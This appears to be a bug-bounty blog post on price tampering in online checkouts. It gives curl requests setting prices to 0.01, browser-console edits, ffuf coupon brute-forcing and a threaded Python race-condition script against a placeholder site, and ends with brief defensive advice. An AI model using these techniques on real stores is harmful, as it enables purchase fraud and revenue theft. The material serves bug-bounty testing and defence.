Price Tampering: A Business Logic Error in Bug Bounty

By /

Listen to this Post

Featured Image
Learn more about business logic errors from this YouTube video:
https://lnkd.in/gZ75F6Uk

You Should Know:

Price tampering is a common business logic vulnerability where attackers manipulate product prices during transactions. This can occur due to weak server-side validation, insecure API endpoints, or flawed discount logic. Below are practical steps to test and exploit price tampering vulnerabilities:

1. Intercepting and Modifying Requests

Use Burp Suite or OWASP ZAP to intercept HTTP requests during checkout:

 Start Burp Suite (Linux) 
java -jar burpsuite_pro.jar

Modify the `price` or `total_amount` parameter before forwarding the request.

2. Testing API Endpoints

Check if APIs allow direct price manipulation:

curl -X POST 'https://target.com/api/checkout' \
-H 'Content-Type: application/json' \
-d '{"product_id": "123", "price": 0.01}'

3. JavaScript Manipulation

If frontend controls pricing, modify JavaScript values in the browser console:

document.getElementById('totalPrice').value = 1;

4. Coupon/Discount Exploitation

Brute-force or reverse-engineer coupon codes:

 Using ffuf for coupon brute-forcing 
ffuf -w wordlist.txt -u "https://target.com/apply_coupon?code=FUZZ" -mr "discount_applied"

5. Race Condition Exploitation

Send multiple parallel requests to exploit timing flaws:

 Using Python with threading 
import requests
import threading

def exploit():
requests.post('https://target.com/checkout', data={'price': 0.01})

for _ in range(20):
threading.Thread(target=exploit).start()

6. Bypassing Client-Side Checks

If the frontend validates prices, replay modified requests directly to the backend:

 Using curl to bypass frontend validation 
curl -X POST 'https://target.com/process_payment' --data-raw 'original_price=100&modified_price=1'

7. Hidden Parameter Tampering

Check for hidden form fields or API parameters:

<input type="hidden" name="actual_price" value="100.00">

Modify this using browser dev tools or proxy tools.

What Undercode Say

Price tampering is a critical business logic flaw that can lead to significant revenue loss. Always validate prices server-side, implement strict access controls, and audit discount/coupon logic. Use rate limiting to prevent race conditions and monitor for abnormal transactions.

Expected Output:

  • Successful price modification at checkout.
  • Unauthorized discounts applied via API manipulation.
  • Proof-of-concept (PoC) demonstrating the exploit.

For deeper insights, refer to the original video: https://lnkd.in/gZ75F6Uk

References:

Reported By: Vbvishalbarot Vapt – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: